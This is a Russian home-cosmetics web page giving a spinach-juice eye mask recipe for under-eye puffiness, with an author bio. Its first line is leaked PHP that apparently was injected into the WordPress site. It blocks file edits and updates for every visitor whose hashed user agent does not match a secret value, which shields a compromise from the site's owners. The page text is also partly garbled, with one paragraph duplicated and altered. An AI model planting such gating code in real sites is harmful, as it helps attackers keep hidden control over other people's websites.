if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Как справиться с отеками под глазами | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт маски со шпинатом от отеков под глазами

Многие женщины сталкиваются с такой проблемой, как отеки под глазами. Справиться с этой проблемой поможет шпинат, точнее, маска, приготовленная с его использованием.

Мно­гие жен­щи­ны стал­ки­ва­ют­ся с такой про­бле­мой, как синя­ки под гла­за­ми. Спра­вить­ся с этой про­бле­мой помо­жет шпи­нат, точ­нее, мас­ка, при­го­тов­лен­ная с его использованием.

С помо­щью соко­вы­жи­мал­ки сле­ду­ет выжать сок из шпи­на­та. Пре­крас­но подой­дет для это­го и замо­ро­жен­ный шпи­нат. Далее, гото­вит­ся мас­ка для кото­рой потребуется:

  1. Сок шпи­на­та – 1 ч. л.
  2. Вита­мин А (мас­ло) – 10 мл.
  3. Крем для кожи вокруг глаз – 1 ч. л.

Все сме­ши­ва­ет­ся. И нано­сит­ся на про­блем­ные участ­ки на пол­ча­са. Курс лече­ния сле­ду­ю­щий: мас­ка нано­сит­ся несколь­ко дней под­ряд по утрам. В даль­ней­шем доста­точ­но нано­сит ее через день или два.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!